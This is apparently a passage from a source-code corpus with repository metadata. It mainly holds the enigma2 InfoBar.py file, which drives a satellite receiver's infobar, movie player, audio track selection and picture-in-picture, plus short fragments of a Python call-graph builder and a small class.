return MappingConstantSymbol(self, dict, keys, values)
raise RuntimeError("Can't convert value to symbol: " + str(value))
# dogfooding build function
if __name__ == "__main__":
builder = CallGraphBuilder()
kwargs = {"self": CallGraphBuilder, "function": CallGraphBuilder.build}
root = builder.build(CallGraphBuilder.build, kwargs)
print(80 * "=")
dump_tree(root, lambda x: x.children)
|
burlog/py-static-callgraph
|
callgraph/builder.py
|
Python
|
mit
| 5,632
| 0.002308
|
from Tools.Profile import profile
from Tools.BoundFunction import boundFunction
# workaround for required config entry dependencies.
import Screens.MovieSelection
from Components.PluginComponent import plugins
from Plugins.Plugin import PluginDescriptor
from Screens.Screen import Screen
from Screens.MessageBox import MessageBox
from Components.Label import Label
from Components.Pixmap import MultiPixmap
from Tools.Directories import fileExists
profile("LOAD:enigma")
import enigma
import os
from boxbranding import getBoxType, getMachineBrand, getBrandOEM, getMachineBuild, getMachineName
boxtype = getBoxType()
profile("LOAD:InfoBarGenerics")
from Screens.InfoBarGenerics import InfoBarShowHide, \
InfoBarNumberZap, InfoBarChannelSelection, InfoBarMenu, InfoBarRdsDecoder, InfoBarRedButton, InfoBarTimerButton, InfoBarVmodeButton, \
InfoBarEPG, InfoBarSeek, InfoBarInstantRecord, InfoBarResolutionSelection, InfoBarAspectSelection, \
InfoBarAudioSelection, InfoBarAdditionalInfo, InfoBarNotifications, InfoBarDish, InfoBarUnhandledKey, InfoBarLongKeyDetection, \
InfoBarSubserviceSelection, InfoBarShowMovies, \
InfoBarServiceNotifications, InfoBarPVRState, InfoBarCueSheetSupport, InfoBarSimpleEventView, InfoBarBuffer, \
InfoBarSummarySupport, InfoBarMoviePlayerSummarySupport, InfoBarTimeshiftState, InfoBarTeletextPlugin, InfoBarExtensions, \
InfoBarSubtitleSupport, InfoBarPiP, InfoBarPlugins, InfoBarServiceErrorPopupSupport, InfoBarJobman, InfoBarZoom, InfoBarSleepTimer, InfoBarOpenOnTopHelper, \
InfoBarHdmi, setResumePoint, delResumePoint
from Screens.ButtonSetup import InfoBarButtonSetup
profile("LOAD:InitBar_Components")
from Components.ActionMap import HelpableActionMap
from Components.Timeshift import InfoBarTimeshift
from Components.config import config
from Components.ServiceEventTracker import ServiceEventTracker, InfoBarBase
profile("LOAD:HelpableScreen")
from Screens.HelpMenu import HelpableScreen
class InfoBar(InfoBarBase, InfoBarShowHide,
InfoBarNumberZap, InfoBarChannelSelection, InfoBarMenu, InfoBarEPG, InfoBarRdsDecoder,
InfoBarInstantRecord, InfoBarAudioSelection, InfoBarRedButton, InfoBarTimerButton, InfoBarResolutionSelection, InfoBarAspectSelection, InfoBarVmodeButton,
HelpableScreen, InfoBarAdditionalInfo, InfoBarNotifications, InfoBarDish, InfoBarUnhandledKey, InfoBarLongKeyDetection,
InfoBarSubserviceSelection, InfoBarTimeshift, InfoBarSeek, InfoBarCueSheetSupport, InfoBarBuffer,
InfoBarSummarySupport, InfoBarTimeshiftState, InfoBarTeletextPlugin, InfoBarExtensions,
InfoBarPiP, InfoBarPlugins, InfoBarSubtitleSupport, InfoBarServiceErrorPopupSupport, InfoBarJobman, InfoBarZoom, InfoBarSleepTimer, InfoBarOpenOnTopHelper,
InfoBarHdmi, Screen, InfoBarButtonSetup):
ALLOW_SUSPEND = True
instance = None
def __init__(self, session):
Screen.__init__(self, session)
if config.usage.show_infobar_lite.value and (config.skin.primary_skin.value == "OPD-Blue-Line/skin.xml" or config.skin.primary_skin.value.startswith('oDreamy-FHD/skin.xml/')):
self.skinName = "OPD-Blue-Line/skin.xml"
self["actions"] = HelpableActionMap(self, "InfobarActions",
{
"showMovies": (self.showMovies, _("Play recorded movies...")),
"showRadio": (self.showRadioButton, _("Show the radio player...")),
"showTv": (self.showTvButton, _("Show the tv player...")),
"toogleTvRadio": (self.toogleTvRadio, _("Toggels between tv and radio...")),
"openBouquetList": (self.openBouquetList, _("Open bouquetlist...")),
"showMediaPlayer": (self.showMediaPlayer, _("Show the media player...")),
"openBouquetList": (self.openBouquetList, _("open bouquetlist")),
"openWeather": (self.openWeather, _("Open Weather...")),
"openTimerList": (self.openTimerList, _("Open Timerlist...")),
"openAutoTimerList": (self.openAutoTimerList, _("Open AutoTimerlist...")),
"openEPGSearch": (self.openEPGSearch, _("Open EPGSearch...")),
"openIMDB": (self.openIMDB, _("Open IMDB...")),
"showMC": (self.showMediaCenter, _("Show the media center...")),
"openSleepTimer": (self.openPowerTimerList, _("Show the Sleep Timer...")),
'ZoomInOut': (self.ZoomInOut, _('Zoom In/Out TV...')),
'ZoomOff': (self.ZoomOff, _('Zoom Off...')),
'HarddiskSetup': (self.HarddiskSetup, _('Select HDD')),
"showWWW": (self.showPORTAL, _("Open MediaPortal...")),
"showSetup": (self.showSetup, _("Show setup...")),
"showFormat": (self.showFormat, _("Show Format Setup...")),
"showPluginBrowser": (self.showPluginBrowser, _("Show the plugins...")),
"showBoxPortal": (self.showBoxPortal, _("Show Box Portal...")),
}, prio=2)
self["key_red"] = Label()
self["key_yellow"] = Label()
self["key_blue"] = Label()
self["key_green"] = Label()
self.allowPiP = True
self.radioTV = 0
for x in HelpableScreen, \
InfoBarBase, InfoBarShowHide, \
InfoBarNumberZap, InfoBarChannelSelection, InfoBarMenu, InfoBarEPG, InfoBarRdsDecoder, \
InfoBarInstantRecord, InfoBarAudioSelection, InfoBarRedButton, InfoBarTimerButton, InfoBarUnhandledKey, InfoBarLongKeyDetection, InfoBarResolutionSelection, InfoBarVmodeButton, \
InfoBarAdditionalInfo, InfoBarNotifications, InfoBarDish, InfoBarSubserviceSelection, InfoBarAspectSelection, InfoBarBuffer, \
InfoBarTimeshift, InfoBarSeek, InfoBarCueSheetSupport, InfoBarSummarySupport, InfoBarTimeshiftState, \
InfoBarTeletextPlugin, InfoBarExtensions, InfoBarPiP, InfoBarSubtitleSupport, InfoBarJobman, InfoBarZoom, InfoBarSleepTimer, InfoBarOpenOnTopHelper, \
InfoBarHdmi, InfoBarPlugins, InfoBarServiceErrorPopupSupport, InfoBarButtonSetup:
x.__init__(self)
self.helpList.append((self["actions"], "InfobarActions", [("showMovies", _("Watch recordings..."))]))
self.helpList.append((self["actions"], "InfobarActions", [("showRadio", _("Listen to the radio..."))]))
self.__event_tracker = ServiceEventTracker(screen=self, eventmap=
{
enigma.iPlayableService.evUpdatedEventInfo: self.__eventInfoChanged
})
self.current_begin_time=0
assert InfoBar.instance is None, "class InfoBar is a singleton class and just one instance of this class is allowed!"
InfoBar.instance = self
if config.misc.initialchannelselection.value:
self.onShown.append(self.showMenu)
self.zoomrate = 0
self.zoomin = 1
self.onShow.append(self.doButtonsCheck)
def showMenu(self):
self.onShown.remove(self.showMenu)
config.misc.initialchannelselection.value = False
config.misc.initialchannelselection.save()
self.mainMenu()
def doButtonsCheck(self):
if config.plisettings.ColouredButtons.value:
self["key_yellow"].setText(_("Extensions"))
if config.usage.defaultEPGType.value == "Graphical EPG..." or config.usage.defaultEPGType.value == "None":
self["key_red"].setText(_("Single EPG"))
else:
self["key_red"].setText(_("ViX EPG"))
if not config.plisettings.Subservice.value:
self["key_green"].setText(_("Timers"))
else:
self["key_green"].setText(_("Green Panel"))
self["key_blue"].setText(_("Blue Panel"))
def __onClose(self):
InfoBar.instance = None
def __eventInfoChanged(self):
if self.execing:
service = self.session.nav.getCurrentService()
old_begin_time = self.current_begin_time
info = service and service.info()
ptr = info and info.getEvent(0)
self.current_begin_time = ptr and ptr.getBeginTime() or 0
if config.usage.show_infobar_on_event_change.value:
if old_begin_time and old_begin_time != self.current_begin_time:
self.doShow()
def __checkServiceStarted(self):
self.__serviceStarted(True)
self.onExecBegin.remove(self.__checkServiceStarted)
def serviceStarted(self): #override from InfoBarShowHide
new = self.servicelist.newServicePlayed()
if self.execing:
InfoBarShowHide.serviceStarted(self)
self.current_begin_time=0
elif not self.__checkServiceStarted in self.onShown and new:
self.onShown.append(self.__checkServiceStarted)
def __checkServiceStarted(self):
self.serviceStarted()
self.onShown.remove(self.__checkServiceStarted)
def openBouquetList(self):
if config.usage.tvradiobutton_mode.value == "MovieList":
self.showTvChannelList(True)
self.showMovies()
elif config.usage.tvradiobutton_mode.value == "ChannelList":
self.showTvChannelList(True)
elif config.usage.tvradiobutton_mode.value == "BouquetList":
self.showTvChannelList(True)
self.servicelist.showFavourites()
def showTvButton(self):
if boxtype.startswith('gb') or boxtype in ('classm', 'genius', 'evo', 'galaxym6'):
self.toogleTvRadio()
elif boxtype in ('uniboxhd1', 'uniboxhd2', 'uniboxhd3', 'sezam5000hd', 'mbtwin'):
self.showMovies()
else:
self.showTv()
def showTv(self):
if config.usage.tvradiobutton_mode.value == "MovieList":
self.showTvChannelList(True)
self.showMovies()
elif config.usage.tvradiobutton_mode.value == "BouquetList":
self.showTvChannelList(True)
if config.usage.show_servicelist.value:
self.servicelist.showFavourites()
else:
self.showTvChannelList(True)
def showRadioButton(self):
if boxtype.startswith('gb') or boxtype.startswith('azbox') or boxtype in ('classm', 'genius', 'evo', 'galaxym6', 'uniboxhd1', 'uniboxhd2', 'uniboxhd3', 'sezam5000hd', 'mbtwin', 'beyonwizt3'):
self.toogleTvRadio()
else:
self.showRadio()
def showRadio(self):
if config.usage.e1like_radio_mode.value:
if config.usage.tvradiobutton_mode.value == "BouquetList":
self.showRadioChannelList(True)
if config.usage.show_servicelist.value:
self.servicelist.showFavourites()
else:
self.showRadioChannelList(True)
else:
self.rds_display.hide() # in InfoBarRdsDecoder
from Screens.ChannelSelection import ChannelSelectionRadio
self.session.openWithCallback(self.ChannelSelectionRadioClosed, ChannelSelectionRadio, self)
def toogleTvRadio(self):
if self.radioTV == 1:
self.radioTV = 0
self.showTv()
else:
self.radioTV = 1
self.showRadio()
def ChannelSelectionRadioClosed(self, *arg):
self.rds_display.show() # in InfoBarRdsDecoder
self.radioTV = 0
self.doShow()
def showMovies(self, defaultRef=None):
if getMachineBrand() == 'GI' or boxtype.startswith('azbox') or boxtype.startswith('ini') or boxtype.startswith('venton'):
from Screens.BoxPortal import BoxPortal
self.session.open(BoxPortal)
else:
self.showMoviePlayer(defaultRef)
def showMoviePlayer(self, defaultRef=None): #for using with hotkeys (ButtonSetup.py) regardless of plugins which overwrite the showMovies function
self.lastservice = self.session.nav.getCurrentlyPlayingServiceOrGroup()
if self.lastservice and ':0:/' in self.lastservice.toString():
self.lastservice = enigma.eServiceReference(config.movielist.curentlyplayingservice.value)
self.session.openWithCallback(self.movieSelected, Screens.MovieSelection.MovieSelection, defaultRef, timeshiftEnabled = self.timeshiftEnabled())
def movieSelected(self, service):
ref = self.lastservice
del self.lastservice
if service is None:
if ref and not self.session.nav.getCurrentlyPlayingServiceOrGroup():
self.session.nav.playService(ref)
else:
self.session.open(MoviePlayer, service, slist = self.servicelist, lastservice = ref)
def showMediaPlayer(self):
try:
from Plugins.Extensions.MediaPlayer.plugin import MediaPlayer
self.session.open(MediaPlayer)
no_plugin = False
except Exception, e:
self.session.open(MessageBox, _("The MediaPlayer plugin is not installed!\nPlease install it."), type = MessageBox.TYPE_INFO,timeout = 10 )
def showMediaCenter(self):
try:
from Plugins.Extensions.BMediaCenter.plugin import DMC_MainMenu
self.session.open(DMC_MainMenu)
no_plugin = False
except Exception, e:
self.session.open(MessageBox, _("The MediaCenter plugin is not installed!\nPlease install it."), type = MessageBox.TYPE_INFO,timeout = 10 )
def openSleepTimer(self):
from Screens.SleepTimerEdit import SleepTimerEdit
self.session.open(SleepTimerEdit)
def openTimerList(self):
from Screens.TimerEdit import TimerEditList
self.session.open(TimerEditList)
def openPowerTimerList(self):
from Screens.PowerTimerEdit import PowerTimerEditList
self.session.open(PowerTimerEditList)
def openAutoTimerList(self):
try:
for plugin in plugins.getPlugins([PluginDescriptor.WHERE_PLUGINMENU ,PluginDescriptor.WHERE_EXTENSIONSMENU, PluginDescriptor.WHERE_EVENTINFO]):
if plugin.name == _("AutoTimer"):
self.runPlugin(plugin)
break
except Exception, e:
self.session.open(MessageBox, _("The AutoTimer plugin is not installed!\nPlease install it."), type = MessageBox.TYPE_INFO,timeout = 10 )
def openWeather(self):
try:
for plugin in plugins.getPlugins([PluginDescriptor.WHERE_PLUGINMENU ,PluginDescriptor.WHERE_EXTENSIONSMENU, PluginDescriptor.WHERE_EVENTINFO]):
if plugin.name == _("Weather Details"):
self.runPlugin(plugin)
break
except Exception, e:
self.session.open(MessageBox, _("The Weather plugin is not installed!\nPlease install it."), type = MessageBox.TYPE_INFO,timeout = 10 )
def openEPGSearch(self):
try:
for plugin in plugins.getPlugins([PluginDescriptor.WHERE_PLUGINMENU ,PluginDescriptor.WHERE_EXTENSIONSMENU, PluginDescriptor.WHERE_EVENTINFO]):
if plugin.name == _("EPGSearch") or plugin.name == _("search EPG...") or plugin.name == "Durchsuche EPG...":
self.runPlugin(plugin)
break
except Exception, e:
self.session.open(MessageBox, _("The EPGSearch plugin is not installed!\nPlease install it."), type = MessageBox.TYPE_INFO,timeout = 10 )
def openIMDB(self):
try:
for plugin in plugins.getPlugins([PluginDescriptor.WHERE_PLUGINMENU ,PluginDescriptor.WHERE_EXTENSIONSMENU, PluginDescriptor.WHERE_EVENTINFO]):
if plugin.name == _("IMDb Details"):
self.runPlugin(plugin)
break
except Exception, e:
self.session.open(MessageBox, _("The IMDb plugin is not installed!\nPlease install it."), type = MessageBox.TYPE_INFO,timeout = 10 )
def ZoomInOut(self):
zoomval = 0
if self.zoomrate > 3:
self.zoomin = 0
elif self.zoomrate < -9:
self.zoomin = 1
if self.zoomin == 1:
self.zoomrate += 1
else:
self.zoomrate -= 1
if self.zoomrate < 0:
zoomval = abs(self.zoomrate) + 10
else:
zoomval = self.zoomrate
print 'zoomRate:', self.zoomrate
print 'zoomval:', zoomval
if fileExists("/proc/stb/vmpeg/0/zoomrate"):
file = open('/proc/stb/vmpeg/0/zoomrate', 'w')
file.write('%d' % int(zoomval))
file.close()
def ZoomOff(self):
self.zoomrate = 0
self.zoomin = 1
if fileExists("/proc/stb/vmpeg/0/zoomrate"):
file = open('/proc/stb/vmpeg/0/zoomrate', 'w')
file.write(str(0))
file.close()
def HarddiskSetup(self):
from Screens.HarddiskSetup import HarddiskSelection
self.session.open(HarddiskSelection)
def showPORTAL(self):
try:
from Plugins.Extensions.MediaPortal.plugin import MPmain as MediaPortal
MediaPortal(self.session)
no_plugin = False
except Exception, e:
self.session.open(MessageBox, _("The MediaPortal plugin is not installed!\nPlease install it."), type = MessageBox.TYPE_INFO,timeout = 10 )
def showSetup(self):
from Screens.Menu import MainMenu, mdom
root = mdom.getroot()
for x in root.findall("menu"):
y = x.find("id")
if y is not None:
id = y.get("val")
if id and id == "setup":
self.session.infobar = self
self.session.open(MainMenu, x)
return
def showFormat(self):
try:
from Plugins.SystemPlugins.Videomode.plugin import videoSetupMain
self.session.instantiateDialog(videoSetupMain)
no_plugin = False
except Exception, e:
self.session.open(MessageBox, _("The VideoMode plugin is not installed!\nPlease install it."), type = MessageBox.TYPE_INFO,timeout = 10 )
def showPluginBrowser(self):
from OPENDROID.GreenPanel import GreenPanel
self.session.open(GreenPanel)
def showBoxPortal(self):
if getMachineBrand() == 'GI' or boxtype.startswith('azbox') or boxtype.startswith('ini') or boxtype.startswith('venton'):
from Screens.BoxPortal import BoxPortal
self.session.open(BoxPortal)
else:
self.showMovies()
def setAudioTrack(service):
try:
from Tools.ISO639 import LanguageCodes as langC
tracks = service and service.audioTracks()
nTracks = tracks and tracks.getNumberOfTracks() or 0
if not nTracks: return
idx = 0
trackList = []
for i in xrange(nTracks):
audioInfo = tracks.getTrackInfo(i)
lang = audioInfo.getLanguage()
if langC.has_key(lang):
lang = langC[lang][0]
desc = audioInfo.getDescription()
track = idx, lang, desc
idx += 1
trackList += [track]
seltrack = tracks.getCurrentTrack()
# we need default selected language from image
# to set the audiotrack if "config.autolanguage.audio_autoselect...values" are not set
from Components.Language import language
syslang = language.getLanguage()[:2]
syslang = langC[syslang][0]
if (config.autolanguage.audio_autoselect1.value or config.autolanguage.audio_autoselect2.value or config.autolanguage.audio_autoselect3.value or config.autolanguage.audio_autoselect4.value) != "---":
audiolang = [config.autolanguage.audio_autoselect1.value, config.autolanguage.audio_autoselect2.value, config.autolanguage.audio_autoselect3.value, config.autolanguage.audio_autoselect4.value]
caudiolang = True
else:
audiolang = syslang
caudiolang = False
useAc3 = config.autolanguage.audio_defaultac3.value
if useAc3:
matchedAc3 = tryAudioTrack(tracks, audiolang, caudiolang, trackList, seltrack, useAc3)
if matchedAc3: return
matchedMpeg = tryAudioTrack(tracks, audiolang, caudiolang, trackList, seltrack, False)
if matchedMpeg: return
tracks.selectTrack(0) # fallback to track 1(0)
return
else:
matchedMpeg = tryAudioTrack(tracks, audiolang, caudiolang, trackList, seltrack, False)
if matchedMpeg: return
matchedAc3 = tryAudioTrack(tracks, audiolang, caudiolang, trackList, seltrack, useAc3)
if matchedAc3: return
tracks.selectTrack(0) # fallback to track 1(0)
except Exception, e:
print("[MoviePlayer] audioTrack exception:\n" + str(e))
def tryAudioTrack(tracks, audiolang, caudiolang, trackList, seltrack, useAc3):
for entry in audiolang:
if caudiolang:
# we need here more replacing for other language, or new configs with another list !!!
# choice gives only the value, never the description
# so we can also make some changes in "config.py" to get the description too, then we dont need replacing here !
entry = entry.replace('eng qaa Englisch', 'English').replace('deu ger', 'German')
for x in trackList:
if entry == x[1] and seltrack == x[0]:
if useAc3:
if x[2].startswith('AC'):
print("[MoviePlayer] audio track is current selected track: " + str(x))
return True
else:
print("[MoviePlayer] audio track is current selected track: " + str(x))
return True
elif entry == x[1] and seltrack != x[0]:
if useAc3:
if x[2].startswith('AC'):
print("[MoviePlayer] audio track match: " + str(x))
tracks.selectTrack(x[0])
return True
else:
print("[MoviePlayer] audio track match: " + str(x))
tracks.selectTrack(x[0])
return True
return False
class MoviePlayer(InfoBarAspectSelection, InfoBarSimpleEventView, InfoBarBase, InfoBarShowHide, InfoBarLongKeyDetection, InfoBarMenu, InfoBarEPG, \
InfoBarSeek, InfoBarShowMovies, InfoBarInstantRecord, InfoBarAudioSelection, HelpableScreen, InfoBarNotifications,
InfoBarServiceNotifications, InfoBarPVRState, InfoBarCueSheetSupport,
InfoBarMoviePlayerSummarySupport, InfoBarSubtitleSupport, Screen, InfoBarTeletextPlugin,
InfoBarServiceErrorPopupSupport, InfoBarExtensions, InfoBarPlugins, InfoBarPiP, InfoBarZoom, InfoBarHdmi, InfoBarButtonSetup):
ENABLE_RESUME_SUPPORT = True
ALLOW_SUSPEND = True
instance = None
def __init__(self, session, service, slist = None, lastservice = None):
Screen.__init__(self, session)
InfoBarAspectSelection.__init__(self)
InfoBarAudioSelection.__init__(self)
InfoBarSimpleEventView.__init__(self)
self.pts_pvrStateDialog = ""
self["key_yellow"] = Label()
self["key_blue"] = Label()
self["key_green"] = Label()
self["eventname"] = Label()
self["state"] = Label()
self["speed"] = Label()
self["statusicon"] = MultiPixmap()
self["actions"] = HelpableActionMap(self, "MoviePlayerActions",
{
"leavePlayer": (self.leavePlayer, _("leave movie player...")),
"leavePlayerOnExit": (self.leavePlayerOnExit, _("leave movie player..."))
})
self.allowPiP = True
for x in HelpableScreen, InfoBarShowHide, InfoBarLongKeyDetection, InfoBarMenu, InfoBarEPG, \
InfoBarBase, InfoBarSeek, InfoBarShowMovies, InfoBarInstantRecord, \
InfoBarAudioSelection, InfoBarNotifications, InfoBarSimpleEventView, \
InfoBarServiceNotifications, InfoBarPVRState, InfoBarCueSheetSupport, \
InfoBarMoviePlayerSummarySupport, InfoBarSubtitleSupport, \
InfoBarTeletextPlugin, InfoBarServiceErrorPopupSupport, InfoBarExtensions, \
InfoBarPlugins, InfoBarPiP, InfoBarZoom, InfoBarButtonSetup:
x.__init__(self)
self.onChangedEntry = [ ]
self.servicelist = slist
self.lastservice = lastservice or session.nav.getCurrentlyPlayingServiceOrGroup()
session.nav.playService(service)
self.cur_service = service
self.returning = False
self.onClose.append(self.__onClose)
self.onShow.append(self.doButtonsCheck)
self.__event_tracker = ServiceEventTracker(screen=self, eventmap=
{
enigma.iPlayableService.evStart: self.__evStart
})
assert MoviePlayer.instance is None, "class InfoBar is a singleton class and just one instance of this class is allowed!"
MoviePlayer.instance = self
# is needed for every first call of MoviePlayer
self.__evStart()
def __evStart(self):
self.switchAudioTimer = enigma.eTimer()
self.switchAudioTimer.callback.append(self.switchAudio)
self.switchAudioTimer.start(750, True) # 750 is a safe-value
def switchAudio(self):
service = self.session.nav.getCurrentlyPlayingServiceOrGroup()
if service:
# we go this way for other extensions as own records(they switch over pmt)
path = service.getPath()
import os
ext = os.path.splitext(path)[1].lower()
exts = [".mkv", ".avi", ".divx", ".mp4"] # we need more extensions here ?
if ext.lower() in exts:
service = self.session.nav.getCurrentService()
if service:
setAudioTrack(service)
def doButtonsCheck(self):
if config.plisettings.ColouredButtons.value:
self["key_yellow"].setText(_("Extensions"))
self["key_green"].setText(_("Green Panel"))
self["key_blue"].setText(_("Blue Panel"))
def __onClose(self):
MoviePlayer.instance = None
from Screens.MovieSelection import playlist
del playlist[:]
Screens.InfoBar.InfoBar.instance.callServiceStarted()
self.session.nav.playService(self.lastservice)
config.usage.last_movie_played.value = self.cur_service.toString()
config.usage.last_movie_played.save()
def handleLeave(self, how):
self.is_closing = True
if how == "ask":
if config.usage.setup_level.index < 2: # -expert
list = (
(_("Yes"), "quit"),
(_("No"), "continue")
)
else:
list = (
(_("Yes"), "quit"),
(_("Yes, returning to movie list"), "movielist"),
(_("Yes, and delete this movie"), "quitanddelete"),
(_("Yes, delete this movie and return to movie list"), "deleteandmovielist"),
(_("No"), "continue"),
(_("No, but restart from begin"), "restart")
)
from Screens.ChoiceBox import ChoiceBox
self.session.openWithCallback(self.leavePlayerConfirmed, ChoiceBox, title=_("Stop playing this movie?"), list = list)
else:
self.leavePlayerConfirmed([True, how])
def leavePlayer(self):
setResumePoint(self.session)
self.handleLeave(config.usage.on_movie_stop.value)
def leavePlayerOnExit(self):
if self.shown:
self.hide()
elif self.session.pipshown and "popup" in config.usage.pip_hideOnExit.value:
if config.usage.pip_hideOnExit.value == "popup":
self.session.openWithCallback(self.hidePipOnExitCallback, MessageBox, _("Disable Picture in Picture"), simple=True)
else:
self.hidePipOnExitCallback(True)
elif config.usage.leave_movieplayer_onExit.value == "popup":
self.session.openWithCallback(self.leavePlayerOnExitCallback, MessageBox, _("Exit movie player?"), simple=True)
elif config.usage.leave_movieplayer_onExit.value == "without popup":
self.leavePlayerOnExitCallback(True)
elif config.usage.leave_movieplayer_onExit.value == "stop":
self.leavePlayer()
def leavePlayerOnExitCallback(self, answer):
if answer:
setResumePoint(self.session)
self.handleLeave("quit")
def hidePipOnExitCallback(self, answer):
if answer:
self.showPiP()
def deleteConfirmed(self, answer):
if answer:
self.leavePlayerConfirmed((True, "quitanddeleteconfirmed"))
def deleteAndMovielistConfirmed(self, answer):
if answer:
self.leavePlayerConfirmed((True, "deleteandmovielistconfirmed"))
def movielistAgain(self):
from Screens.MovieSelection import playlist
del playlist[:]
self.session.nav.playService(self.lastservice)
self.leavePlayerConfirmed((True, "movielist"))
def leavePlayerConfirmed(self, answer):
answer = answer and answer[1]
if answer is None:
return
if answer in ("quitanddelete", "quitanddeleteconfirmed", "deleteandmovielist", "deleteandmovielistconfirmed"):
ref = self.session.nav.getCurrentlyPlayingServiceOrGroup()
serviceHandler = enigma.eServiceCenter.getInstance()
if answer in ("quitanddelete", "deleteandmovielist"):
msg = ''
if config.usage.movielist_trashcan.value:
import Tools.Trashcan
try:
trash = Tools.Trashcan.createTrashFolder(ref.getPath())
Screens.MovieSelection.moveServiceFiles(ref, trash)
# Moved to trash, okay
if answer == "quitanddelete":
self.close()
else:
self.movielistAgain()
return
except Exception, e:
print "[InfoBar] Failed to move to .Trash folder:", e
msg = _("Cannot move to trash can") + "\n" + str(e) + "\n"
info = serviceHandler.info(ref)
name = info and info.getName(ref) or _("this recording")
msg += _("Do you really want to delete %s?") % name
if answer == "quitanddelete":
self.session.openWithCallback(self.deleteConfirmed, MessageBox, msg)
elif answer == "deleteandmovielist":
self.session.openWithCallback(self.deleteAndMovielistConfirmed, MessageBox, msg)
return
elif answer in ("quitanddeleteconfirmed", "deleteandmovielistconfirmed"):
offline = serviceHandler.offlineOperations(ref)
if offline.deleteFromDisk(0):
self.session.openWithCallback(self.close, MessageBox, _("You cannot delete this!"), MessageBox.TYPE_ERROR)
if answer == "deleteandmovielistconfirmed":
self.movielistAgain()
return
if answer in ("quit", "quitanddeleteconfirmed"):
self.close()
elif answer in ("movielist", "deleteandmovielistconfirmed"):
if config.movielist.stop_service.value:
ref = self.session.nav.getCurrentlyPlayingServiceOrGroup()
else:
ref = self.lastservice
self.returning = True
self.session.openWithCallback(self.movieSelected, Screens.MovieSelection.MovieSelection, ref)
self.session.nav.stopService()
if not config.movielist.stop_service.value:
self.session.nav.playService(self.lastservice)
elif answer == "restart":
self.doSeek(0)
self.setSeekState(self.SEEK_STATE_PLAY)
elif answer in ("playlist","playlistquit","loop"):
( next_service, item , length ) = self.getPlaylistServiceInfo(self.cur_service)
if next_service is not None:
if config.usage.next_movie_msg.value:
self.displayPlayedName(next_service, item, length)
self.session.nav.playService(next_service)
self.cur_service = next_service
else:
if answer == "playlist":
self.leavePlayerConfirmed([True,"movielist"])
elif answer == "loop" and length > 0:
self.leavePlayerConfirmed([True,"loop"])
else:
self.leavePlayerConfirmed([True,"quit"])
elif answer in "repeatcurrent":
if config.usage.next_movie_msg.value:
(item, length) = self.getPlaylistServiceInfo(self.cur_service)
self.displayPlayedName(self.cur_service, item, length)
self.session.nav.stopService()
self.session.nav.playService(self.cur_service)
def doEofInternal(self, playing):
if not self.execing:
return
if not playing :
return
ref = self.session.nav.getCurrentlyPlayingServiceOrGroup()
if ref:
delResumePoint(ref)
self.handleLeave(config.usage.on_movie_eof.value)
def up(self):
slist = self.servicelist
if slist and slist.dopipzap:
if "keep" not in config.usage.servicelist_cursor_behavior.value:
slist.moveUp()
self.session.execDialog(slist)
else:
self.showMovies()
def down(self):
slist = self.servicelist
if slist and slist.dopipzap:
if "keep" not in config.usage.servicelist_cursor_behavior.value:
slist.moveDown()
self.session.execDialog(slist)
else:
self.showMovies()
def right(self):
# XXX: gross hack, we do not really seek if changing channel in pip :-)
slist = self.servicelist
if slist and slist.dopipzap:
# XXX: We replicate InfoBarChannelSelection.zapDown here - we shouldn't do that
if slist.inBouquet():
prev = slist.getCurrentSelection()
if prev:
prev = prev.toString()
while True:
if config.usage.quickzap_bouquet_change.value and slist.atEnd():
slist.nextBouquet()
else:
slist.moveDown()
cur = slist.getCurrentSelection()
if not cur or (not (cur.flags & 64)) or cur.toString() == prev:
break
else:
slist.moveDown()
slist.zap(enable_pipzap = True)
else:
InfoBarSeek.seekFwd(self)
def left(self):
slist = self.servicelist
if slist and slist.dopipzap:
# XXX: We replicate InfoBarChannelSelection.zapUp here - we shouldn't do that
if slist.inBouquet():
prev = slist.getCurrentSelection()
if prev:
prev = prev.toString()
while True:
if config.usage.quickzap_bouquet_change.value:
if slist.atBegin():
slist.prevBouquet()
slist.moveUp()
cur = slist.getCurrentSelection()
if not cur or (not (cur.flags & 64)) or cur.toString() == prev:
break
else:
slist.moveUp()
slist.zap(enable_pipzap = True)
else:
InfoBarSeek.seekBack(self)
def showPiP(self):
slist = self.servicelist
if self.session.pipshown:
if slist and slist.dopipzap:
slist.togglePipzap()
if self.session.pipshown:
del self.session.pip
self.session.pipshown = False
else:
service = self.session.nav.getCurrentService()
info = service and service.info()
xres = str(info.getInfo(enigma.iServiceInformation.sVideoWidth))
if int(xres) <= 720 or not getMachineBuild() == 'blackbox7405':
from Screens.PictureInPicture import PictureInPicture
self.session.pip = self.session.instantiateDialog(PictureInPicture)
self.session.pip.show()
if self.session.pip.playService(slist.getCurrentSelection()):
self.session.pipshown = True
self.session.pip.servicePath = slist.getCurrentServicePath()
else:
self.session.pipshown = False
del self.session.pip
else:
self.session.open(MessageBox, _("Your %s %s does not support PiP HD") % (getMachineBrand(), getMachineName()), type = MessageBox.TYPE_INFO,timeout = 5 )
def movePiP(self):
if self.session.pipshown:
InfoBarPiP.movePiP(self)
def swapPiP(self):
pass
def showMovies(self):
ref = self.session.nav.getCurrentlyPlayingServiceOrGroup()
if ref and ':0:/' not in ref.toString():
self.playingservice = ref # movie list may change the currently playing
else:
self.playingservice = enigma.eServiceReference(config.movielist.curentlyplayingservice.value)
self.session.openWithCallback(self.movieSelected, Screens.MovieSelection.MovieSelection, ref)
def movieSelected(self, service):
if service is not None:
self.cur_service = service
self.is_closing = False
self.session.nav.playService(service)
self.returning = False
elif self.returning:
self.close()
else:
self.is_closing = False
try:
ref = self.playingservice
del self.playingservice
# no selection? Continue where we left off
if ref and not self.session.nav.getCurrentlyPlayingServiceOrGroup():
self.session.nav.playService(ref)
except:
pass
def getPlaylistServiceInfo(self, service):
from MovieSelection import playlist
for i, item in enumerate(playlist):
if item == service:
if config.usage.on_movie_eof.value == "repeatcurrent":
return i+1, len(playlist)
i += 1
if i < len(playlist):
return playlist[i], i+1, len(playlist)
elif config.usage.on_movie_eof.value == "loop":
return playlist[0], 1, len(playlist)
return None, 0, 0
def displayPlayedName(self, ref, index, n):
from Tools import Notifications
Notifications.AddPopup(text = _("%s/%s: %s") % (index, n, self.ref2HumanName(ref)), type = MessageBox.TYPE_INFO, timeout = 5)
def ref2HumanName(self, ref):
return enigma.eServiceCenter.getInstance().info(ref).getName(ref)
|
formiano/enigma2
|
lib/python/Screens/InfoBar.py
|
Python
|
gpl-2.0
| 33,112
| 0.029899
|
class target(object):
def __init__(self):
self.encodingString = "1,10 1,10 1,10 1,10 1,10 1.0 p1-1,10 1,10 1,10 1,10 1,10 1.0 p2"
self.canAdd = False
